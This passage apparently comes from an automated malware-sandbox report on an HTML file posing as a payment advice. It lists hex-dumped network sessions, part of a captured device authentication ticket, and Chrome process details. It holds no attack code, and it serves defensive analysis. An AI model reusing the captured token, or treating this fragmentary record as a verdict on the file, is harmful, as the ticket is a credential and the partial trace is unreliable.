                                                                                  2025-01-07 18:50:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 38 7a 67 64 70 78 32 44 30 75 64 78 6c 72 61 62 6b 42 53 42 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: B8zgdpx2D0udxlrabkBSBg.0Payload parsing failed.


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  36192.168.2.65009640.113.110.67443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:51:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 62 56 73 32 72 33 31 31 45 61 70 50 4a 55 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 63 35 35 30 31 62 65 36 62 35 38 61 33 65 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: bbVs2r311EapPJUp.1Context: 76c5501be6b58a3e
                                                                                  2025-01-07 18:51:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:51:10 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 62 56 73 32 72 33 31 31 45 61 70 50 4a 55 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 63 35 35 30 31 62 65 36 62 35 38 61 33 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bbVs2r311EapPJUp.2Context: 76c5501be6b58a3e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
                                                                                  2025-01-07 18:51:10 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 62 56 73 32 72 33 31 31 45 61 70 50 4a 55 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 63 35 35 30 31 62 65 36 62 35 38 61 33 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: bbVs2r311EapPJUp.3Context: 76c5501be6b58a3e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:51:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
                                                                                  2025-01-07 18:51:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 4c 36 6a 54 63 71 74 68 6b 43 52 34 45 2f 67 6e 5a 47 66 74 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: FL6jTcqthkCR4E/gnZGftg.0Payload parsing failed.


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Target ID:1
                                                                                  Start time:13:48:50
                                                                                  Start date:07/01/2025
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Globalfoundries eCHECK- Payment Advice.html"
                                                                                  Imagebase:0x7ff684c40000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:13:48:56
                                                                                  Start date:07/01/2025
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2484,i,4524059451973994455,11659315058774939234,262144 /prefetch:8
                                                                                  Imagebase:0x7ff684c40000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  No disassembly